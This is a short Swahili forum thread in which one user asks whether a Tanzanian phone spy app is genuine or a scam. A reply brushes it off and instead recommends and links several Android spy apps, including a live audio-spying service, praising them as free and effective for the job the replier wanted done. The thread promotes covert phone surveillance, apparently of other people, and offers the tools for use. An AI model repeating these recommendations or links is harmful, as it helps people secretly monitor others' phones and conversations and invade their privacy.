habari wanajf. Naomba kujuzwa kama kuna mtu aliyewahi kutumia iyo app ya tz,je inafanya kazi kweli au ni matapeli kama softbox tanzania
inapatikana kwenye link hii apa. www.spymobiletanzania.wapka.mobi
Achana na wezi hao kusoma hujui ata picha huoni. Best spy app kwangu kwa upande wa android ni hii http://www.spy-phone-app.com/m/ nimeitumia na imepiga mzigo vizuri tu au hii http://trackmyphones.com/cgi-bin/SpyAudio/spyaudio.cgi unaitumia simple tu na bure kabisa na hii Ndiyo iliyofanikisha kazi yangu niliyokuwa naitaka bure kabisa na live bila chenga.